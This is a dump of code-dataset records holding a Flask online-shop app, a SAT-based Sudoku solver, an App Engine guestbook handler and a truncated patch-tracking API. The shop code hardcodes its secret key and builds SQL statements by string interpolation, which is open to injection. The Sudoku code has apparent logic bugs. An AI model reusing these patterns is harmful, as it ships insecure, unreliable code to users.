{"api_name": "numpy.nan", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 63, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}]}
+{"seq_id": "303776768", "text": "import os\r\n\r\nimport requests\r\nfrom flask import Flask, render_template, request, make_response, jsonify, abort, session\r\nfrom flask_login import LoginManager, login_user, login_required, logout_user, current_user\r\nfrom flask_wtf import FlaskForm\r\nfrom werkzeug.utils import redirect\r\nfrom wtforms import PasswordField, StringField, TextAreaField, SubmitField, BooleanField\r\nfrom wtforms.fields.html5 import EmailField\r\nimport sqlite3\r\nimport shutil\r\n\r\n# noinspection PyUnresolvedReferences\r\nfrom wtforms.validators import DataRequired\r\n# noinspection PyUnresolvedReferences\r\nfrom data import db_session\r\n# noinspection PyUnresolvedReferences\r\nfrom data.users import User\r\n# noinspection PyUnresolvedReferences\r\nfrom data.goods import Goods\r\n# noinspection PyUnresolvedReferences\r\nfrom data.orders import Orders\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\n\r\nclass RegisterForm(FlaskForm):\r\n email = EmailField('Почта', validators=[DataRequired()])\r\n password = PasswordField('Пароль', validators=[DataRequired()])\r\n password_again = PasswordField('Повторите пароль', validators=[DataRequired()])\r\n name = StringField('Имя пользователя', validators=[DataRequired()])\r\n submit = SubmitField('Войти')\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n email = EmailField('Почта', validators=[DataRequired()])\r\n password = PasswordField('Пароль', validators=[DataRequired()])\r\n remember_me = BooleanField('Запомнить меня')\r\n submit = SubmitField('Войти')\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n sessions = db_session.create_session()\r\n return sessions.query(User).get(user_id)\r\n\r\n\r\ndef main():\r\n db_session.global_init(\"db/shop.sqlite\")\r\n app.run(port=8080, host='127.0.0.1')\r\n\r\n\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n return make_response(jsonify({'error': 'Not found'}), 404)\r\n\r\n\r\n@app.route(\"/\", methods=['GET', 'POST'])\r\ndef index():\r\n lis = []\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).all()\r\n if request.method == 'POST':\r\n for i in request.form.getlist('model'):\r\n good = sessions.query(Goods).filter(Goods.id == int(i)).first()\r\n lis.append(good)\r\n return render_template(\"index.html\", title='Отфильтрованные товары', goods=lis)\r\n return render_template(\"index.html\", title='Интернет-магазин', goods=goods)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n session = db_session.create_session()\r\n user = session.query(User).filter(User.email == form.email.data).first()\r\n if user and user.check_password(form.password.data):\r\n login_user(user, remember=form.remember_me.data)\r\n return redirect(\"/\")\r\n return render_template('login.html', title='Авторизация',\r\n message=\"Неправильный логин или пароль\",\r\n form=form)\r\n return render_template('login.html', title='Авторизация', form=form)\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(\"/\")\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef reqister():\r\n form = RegisterForm()\r\n if form.validate_on_submit():\r\n if form.password.data != form.password_again.data:\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Пароли не совпадают\")\r\n session = db_session.create_session()\r\n if session.query(User).filter(User.email == form.email.data).first():\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Такой пользователь уже есть\")\r\n user = User(\r\n name=form.name.data,\r\n email=form.email.data\r\n )\r\n user.set_password(form.password.data)\r\n session.add(user)\r\n session.commit()\r\n return redirect('/login')\r\n return render_template('register.html', title='Регистрация', form=form)\r\n\r\n\r\n@app.route(\"/info/\")\r\ndef info(goods_id):\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).filter(Goods.id == goods_id).first()\r\n return render_template(\"info.html\", title='Информация о товаре', goods=goods)\r\n\r\n\r\n@app.route(\"/add/\")\r\ndef add(goods_id):\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).filter(Goods.id == goods_id).first()\r\n if goods.value > 0:\r\n if 'add' in session:\r\n zn = session['add']\r\n else:\r\n zn = []\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value + 1\r\n WHERE id = {goods.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n ok, sp = True, 0\r\n for i in range(len(zn)):\r\n if goods.id in zn[i]:\r\n ok = False\r\n sp = i\r\n if ok:\r\n zn.append([goods.id, goods.name, goods.image, goods.coast, goods.value])\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n INSERT INTO orders \r\n VALUES ({goods.id}, '{goods.name}', '{goods.content}', '{goods.image}', {goods.coast}, 1)\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n else:\r\n zn[sp][-1] += 1\r\n\r\n session['add'] = zn\r\n return render_template(\"add.html\", title='Добавление товара', goods=goods)\r\n else:\r\n return render_template(\"add.html\", title='Добавление товара', goods=goods, message='нет на скаладе')\r\n\r\n\r\n@app.route(\"/basket\", methods=['GET', 'POST'])\r\ndef basket():\r\n if current_user.is_authenticated == True:\r\n if request.method == 'POST':\r\n button = request.form['button']\r\n but = int(button.split()[1])\r\n sessions = db_session.create_session()\r\n orders = sessions.query(Orders).filter(Orders.id == but).first()\r\n goods = sessions.query(Goods).filter(Goods.id == but).first()\r\n if button.split()[0] == '2':\r\n if orders.value + 1 <= goods.value:\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value + 1\r\n WHERE id = {orders.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n if button.split()[0] == '1':\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n if orders.value - 1 > 0:\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value - 1\r\n WHERE id = {orders.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n if 'add' in session:\r\n goods = session['add']\r\n else:\r\n goods = []\r\n sessions = db_session.create_session()\r\n orders = sessions.query(Orders).all()\r\n for i in range(len(orders)):\r\n goods[i][-1] = orders[i].value\r\n return render_template(\"basket.html\", title='Корзина', goods=goods)\r\n else:\r\n return render_template(\"basket.html\", title='Корзина', me='Авторизуйтесь, чтобы просматривать корзину!')\r\n\r\n\r\n@app.route(\"/clear\")\r\ndef clear():\r\n if 'add' in session:\r\n session['add'] = []\r\n goods = session['add']\r\n\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = \"\"\"DELETE FROM orders\"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n return render_template(\"basket.html\", title='Корзина', goods=goods, message='Ваша корзина пуста')\r\n\r\n\r\n@app.route(\"/order\")\r\ndef order():\r\n # нужно создать БД с заказами пользователей\r\n # вывод общей стоимости товара\r\n\r\n sessions = db_session.create_session()\r\n order = sessions.query(Orders).all()\r\n goods = sessions.query(Goods).all()\r\n total = 0\r\n for i in order:\r\n total += i.coast * i.value\r\n for item in order:\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"UPDATE goods SET value = value - {item.value} WHERE id = {item.id}\"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n if 'add' in session:\r\n session['add'] = []\r\n goods = session['add']\r\n\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = \"\"\"DELETE FROM orders\"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n return render_template(\"order.html\", title='Оформление заказа', goods=goods, total=total)\r\n\r\n\r\n@app.route('/map')\r\ndef map():\r\n mash = 16\r\n mark = '37.74164199829102,55.78153275636508,pm2rdm'\r\n mark2 = ''\r\n map_request = 'https://static-maps.yandex.ru/1.x/?l=map&pt=' + mark + ',' + '&z=' + str(mash)\r\n response = requests.get(map_request)\r\n map_file = 'map.png'\r\n with open(map_file, \"wb\") as file:\r\n file.write(response.content)\r\n\r\n sourse = os.getcwd() + '/map.png'\r\n dest = os.getcwd() + '/static/img/map.png'\r\n shutil.move(sourse, dest)\r\n return render_template('map.html', title='Пункт выдачи')\r\n\r\n\r\n@app.route(\"/cookie_test\")\r\ndef cookie_test():\r\n visits_count = int(request.cookies.get(\"visits_count\", 0))\r\n if visits_count:\r\n res = make_response(f\"Вы пришли на эту страницу {visits_count + 1} раз\")\r\n res.set_cookie(\"visits_count\", str(visits_count + 1),\r\n max_age=60 * 60 * 24 * 365 * 2)\r\n else:\r\n res = make_response(\r\n \"Вы пришли на эту страницу в первый раз за последние 2 года\")\r\n res.set_cookie(\"visits_count\", '1',\r\n max_age=60 * 60 * 24 * 365 * 2)\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 26, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 30, "usage_type": "name"}, {"api_name": "wtforms.fields.html5.EmailField", "line_number": 31, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 31, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.fields.html5.EmailField", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 39, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 40, "usage_type": "call"}, {"api_name": "wtforms.BooleanField", "line_number": 41, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 42, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 47, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 47, "usage_type": "name"}, {"api_name": "data.users.User", "line_number": 48, "usage_type": "argument"}, {"api_name": "data.db_session.global_init", "line_number": 52, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 58, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 58, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 64, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 64, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 65, "usage_type": "argument"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.form.getlist", "line_number": 67, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 68, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 68, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 78, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 78, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.session.query", "line_number": 79, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 79, "usage_type": "argument"}, {"api_name": "flask.session", "line_number": 79, "usage_type": "name"}, {"api_name": "data.users.User.email", "line_number": 79, "usage_type": "attribute"}, {"api_name": "flask_login.login_user", "line_number": 81, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 82, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 86, "usage_type": "call"}, {"api_name": "flask_login.logout_user", "line_number": 92, "usage_type": "call"}, {"api_name": "werkzeug.utils.redirect", "line_number": 93, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 104, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 104, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 104, "usage_type": "name"}, {"api_name": "flask.session.query", "line_number": 105, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 105, "usage_type": "argument"}, {"api_name": "flask.session", "line_number": 105, "usage_type": "name"}, {"api_name": "data.users.User.email", "line_number": 105, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 106, "usage_type": "call"}, {"api_name": "data.users.User", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.session.add", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 114, "usage_type": "name"}, {"api_name": "flask.session.commit", "line_number": 115, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 115, "usage_type": "name"}, {"api_name": "werkzeug.utils.redirect", "line_number": 116, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 117, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 122, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 122, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 123, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 123, "usage_type": "attribute"}, {"api_name": "flask.render_template", "line_number": 124, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 129, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 129, "usage_type": "name"}, {"api_name": "data.goods.Goods", "line_number": 130, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.session", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 133, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 136, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 163, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 164, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 166, "usage_type": "call"}, {"api_name": "flask_login.current_user.is_authenticated", "line_number": 171, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 171, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 172, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 172, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 173, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 173, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 175, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 175, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 176, "usage_type": "argument"}, {"api_name": "data.orders.Orders.id", "line_number": 176, "usage_type": "attribute"}, {"api_name": "data.goods.Goods", "line_number": 177, "usage_type": "argument"}, {"api_name": "data.goods.Goods.id", "line_number": 177, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 180, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 190, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 201, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 202, "usage_type": "name"}, {"api_name": "data.db_session.create_session", "line_number": 205, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 205, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 206, "usage_type": "argument"}, {"api_name": "flask.render_template", "line_number": 209, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 211, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 216, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 217, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 218, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 220, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 225, "usage_type": "call"}, {"api_name": "data.db_session.create_session", "line_number": 233, "usage_type": "call"}, {"api_name": "data.db_session", "line_number": 233, "usage_type": "name"}, {"api_name": "data.orders.Orders", "line_number": 234, "usage_type": "argument"}, {"api_name": "data.goods.Goods", "line_number": 235, "usage_type": "argument"}, {"api_name": "sqlite3.connect", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 246, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 248, "usage_type": "name"}, {"api_name": "sqlite3.connect", "line_number": 250, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 256, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 265, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 270, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 271, "usage_type": "call"}, {"api_name": "shutil.move", "line_number": 272, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 273, "usage_type": "call"}, {"api_name": "flask.request.cookies.get", "line_number": 278, "usage_type": "call"}, {"api_name": "flask.request.cookies", "line_number": 278, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 278, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 280, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 284, "usage_type": "call"}]}
+{"seq_id": "439810512", "text": "import pycosat\n\n## Hard coded sudoku dimensions\nN = 9\nM = 3\n\n\ndef getAllValidMoves(x0, y0):\n \"\"\"Get all valid knight's moves from location x0, y0 on the 9x9 sudoku grid.\"\"\"\n deltas = [\n (-2, -1),\n (-2, +1),\n (+2, -1),\n (+2, +1),\n (-1, -2),\n (-1, +2),\n (+1, -2),\n (+1, +2),\n ]\n validPositions = []\n\n for (x, y) in deltas:\n xCandidate = x0 + x\n yCandidate = y0 + y\n if 0 < xCandidate < 8 and 0 < yCandidate < 8:\n validPositions.append([xCandidate, yCandidate])\n\n return validPositions\n\n\ndef exactly_one_knights_move(variables):\n \"\"\"Check that no cells share the same value as a specific cell when they're a knight's move away.\"\"\"\n cnf = []\n\n for valid_move in variables[:-1]:\n # print(valid_move)\n cnf.append([-valid_move, -variables[-1]])\n\n return cnf\n\n\ndef exactly_one(variables):\n \"\"\"Check that all cells in 'variales' have unique values.\"\"\"\n cnf = [variables]\n n = len(variables)\n\n for i in range(n):\n for j in range(i + 1, n):\n v1 = variables[i]\n v2 = variables[j]\n cnf.append([-v1, -v2])\n\n return cnf\n\n\ndef transform(i, j, k):\n \"\"\"Transform the cell X(i, j, k) into an integer for conversion to CNF.\"\"\"\n return i * N * N + j * N + k + 1\n\n\ndef inverse_transform(v):\n \"\"\"Convert the integer back into i, j, k values.\"\"\"\n v, k = divmod(v - 1, N)\n v, j = divmod(v, N)\n v, i = divmod(v, N)\n return i, j, k\n\n\nwhile True:\n if __name__ == \"__main__\":\n solver_select = input(\n \"What type of sudoku would you like to solve? Options are:\\nClassic\\nDiagonal\\nAnti-Knight\\nMagic Square\\n\"\n )\n cnf = []\n\n # Cell, row and column constraints\n for x in range(N):\n for s in range(N):\n cnf = cnf + exactly_one([transform(x, y, s) for y in range(N)])\n cnf = cnf + exactly_one([transform(y, x, s) for y in range(N)])\n for y in range(N):\n cnf = cnf + exactly_one([transform(x, y, k) for k in range(N)])\n\n # Sub-matrix constraints\n for k in range(N):\n for x in range(M):\n for y in range(M):\n v = [\n transform(y * M + i, x * M + j, k)\n for i in range(M)\n for j in range(M)\n ]\n cnf = cnf + exactly_one(v)\n\n if solver_select.lower() == \"classic\":\n pass\n elif solver_select.lower() == \"diagonal\":\n # Diagonal constraints\n for s in range(N):\n cnf = cnf + exactly_one(\n [transform(x, N - (x + 1), s) for x in range(N)]\n )\n cnf = cnf + exactly_one([transform(x, x, s) for x in range(N)])\n elif solver_select.lower() == \"anti-knight\":\n # Knight's move contraints\n for s in range(N):\n for x in range(N):\n for y in range(N):\n valid_moves = getAllValidMoves(x, y)\n valid_moves.append([x, y])\n cnf = cnf + exactly_one_knights_move(\n [transform(x, y, s) for x, y in valid_moves]\n )\n else:\n print(\"You gave an undefined sudoku type, please try again\")\n break\n\n # cnf = {frozenset(x) for x in cnf}\n # cnf = list(cnf)\n\n # A 16-constraint Sudoku\n # constraints = [\n # (0, 3, 7),\n # (2, 3, 4),\n # (2, 4, 3),\n # (2, 6, 2),\n # (3, 8, 6),\n # (4, 3, 5),\n # (4, 5, 9),\n # (5, 6, 4),\n # (5, 7, 1),\n # (5, 8, 8),\n # (6, 4, 8),\n # (6, 5, 1),\n # (7, 2, 2),\n # (7, 7, 5),\n # (8, 1, 4),\n # (8, 6, 3),\n # ]\n\n # Knight's move, diagonal, magic square sudoku\n constraints = [\n # (8, 8, 2),\n # (3, 0, 3),\n # (3, 1, 8),\n # (3, 2, 4),\n # # Magic square hardcoded\n # (3, 3, 6),\n # (3, 4, 7),\n # (3, 5, 2),\n # (4, 3, 1),\n # (4, 4, 5),\n # (4, 5, 9),\n ]\n\n cnf = cnf + [[transform(z[0], z[1], z[2]) - 1] for z in constraints]\n\n ## Outputs all valid sudoku solutions.\n for solution in pycosat.itersolve(cnf):\n X = [inverse_transform(v) for v in solution if v > 0]\n for i, cell in enumerate(sorted(X, key=lambda h: h[0] * N * N + h[1] * N)):\n print(cell[2] + 1, end=\" \")\n if (i + 1) % N == 0:\n print(\"\")\n print(\"\\n-----------------\\n\")\n", "sub_path": "Sudoku.py", "file_name": "Sudoku.py", "file_ext": "py", "file_size_in_byte": 4834, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pycosat.itersolve", "line_number": 159, "usage_type": "call"}]}
+{"seq_id": "130929224", "text": "from google.appengine.ext import ndb\n\nfrom guestbook.models import City\nfrom guestbook.services import Handler\nfrom guestbook.services.school import SchoolHandler\n\n\nclass CityHandler(Handler):\n model = City\n\n def get_schools(self):\n schools = getattr(self.obj, 'schools', None)\n if schools is not None:\n return SchoolHandler(schools).serializer\n\n def update_school(self, data):\n if 'schools' not in data:\n return data\n\n schools = data.pop('schools', None)\n\n id_school = schools.pop('id')\n handler = SchoolHandler(_id=int(id_school))\n handler.update(schools)\n data['schools'] = handler.serializer\n return data\n\n @ndb.transactional(xg=True)\n def update(self, data):\n updated_data = self.update_school(data)\n self.obj.update(**updated_data)\n\n def create_school(self, data):\n schools = data.pop('schools', None)\n handler = SchoolHandler(_id=schools)\n\n data['schools'] = handler.obj\n return data\n\n @ndb.transactional(xg=True)\n def create(self, data):\n modified_data = self.create_school(data)\n entity = self.model(**modified_data)\n entity.put()\n self.obj = entity\n return CityHandler(entity)\n", "sub_path": "guestbook/services/city.py", "file_name": "city.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "guestbook.services.Handler", "line_number": 8, "usage_type": "name"}, {"api_name": "guestbook.models.City", "line_number": 9, "usage_type": "name"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 14, "usage_type": "call"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 23, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.transactional", "line_number": 28, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 28, "usage_type": "name"}, {"api_name": "guestbook.services.school.SchoolHandler", "line_number": 35, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb.transactional", "line_number": 40, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 40, "usage_type": "name"}]}
+{"seq_id": "66196206", "text": "\"\"\"\nmodule of issue API\n\"\"\"\nimport logging\nfrom flask import request, Blueprint\nfrom sqlalchemy.exc import SQLAlchemyError\nfrom patch_tracking.database.models import Tracking\nfrom patch_tracking.api.business import create_tracking, update_tracking, delete_tracking\nfrom patch_tracking.api.constant import ResponseCode\nfrom patch_tracking.api.auth import auth\n\nlogger = logging.getLogger(__name__)\ntracking = Blueprint('tracking', __name__)\n\n\n@tracking.route('', methods=[\"DELETE\"])\n@auth.login_required\ndef delete():\n \"\"\"\n Delete tracking(s).\n \"\"\"\n input_params = request.args\n keys = list(input_params.keys())\n\n param_error = False\n if not keys or \"repo\" not in keys:\n param_error = True\n\n if len(set(keys) - {\"repo\", \"branch\"}) != 0:\n param_error = True\n\n if param_error:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n try:\n if \"branch\" in keys:\n if Tracking.query.filter(Tracking.repo == input_params['repo'],\n Tracking.branch == input_params['branch']).first():\n delete_tracking(input_params['repo'], input_params['branch'])\n logger.info('Delete tracking repo: %s, branch: %s', input_params['repo'], input_params['branch'])\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS)\n\n logger.info('Delete tracking repo: %s, branch: %s not found.', input_params['repo'], input_params['branch'])\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_NOT_FOUND)\n if Tracking.query.filter(Tracking.repo == input_params['repo']).first():\n delete_tracking(input_params['repo'])\n logger.info('Delete tracking repo: %s', input_params['repo'])\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS)\n\n logger.info('Delete tracking repo: %s not found.', input_params['repo'])\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_NOT_FOUND)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.DELETE_DB_ERROR, data=err)\n\n\n@tracking.route('', methods=[\"GET\"])\ndef get():\n \"\"\"\n Returns list of tracking\n \"\"\"\n if not request.args:\n trackings = Tracking.query.all()\n else:\n allowed_key = ['repo', 'branch', 'enabled']\n input_params = request.args\n\n data = dict()\n for k, param in input_params.items():\n if k in allowed_key:\n if k == 'enabled':\n param = bool(param == 'true')\n data[k] = param\n else:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n trackings = Tracking.query.filter_by(**data).all()\n\n resp_data = list()\n for item in trackings:\n resp_data.append(item.to_json())\n return ResponseCode.ret_message(code=ResponseCode.SUCCESS, data=resp_data)\n\n\n@tracking.route('', methods=[\"POST\"])\n@auth.login_required\ndef post():\n \"\"\"\n Creates or update a tracking.\n \"\"\"\n required_params = ['version_control', 'scm_repo', 'scm_branch', 'scm_commit', 'repo', 'branch', 'enabled']\n input_params = request.json\n data = dict()\n for item in input_params:\n if item in required_params:\n data[item] = input_params[item]\n required_params.remove(item)\n else:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n if len(required_params) > 1 or (len(required_params) == 1 and required_params[0] != 'scm_commit'):\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n if data['version_control'] not in [\"github\", \"git\"]:\n return ResponseCode.ret_message(ResponseCode.INPUT_PARAMETERS_ERROR)\n\n track = Tracking.query.filter_by(repo=data['repo'], branch=data['branch']).first()\n if track:\n try:\n update_tracking(data)\n logger.info('Update tracking. Data: %s.', data)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.INSERT_DATA_ERROR, data=err)\n else:\n try:\n create_tracking(data)\n logger.info('Create tracking. Data: %s.', data)\n except SQLAlchemyError as err:\n return ResponseCode.ret_message(code=ResponseCode.INSERT_DATA_ERROR, data=err)\n return 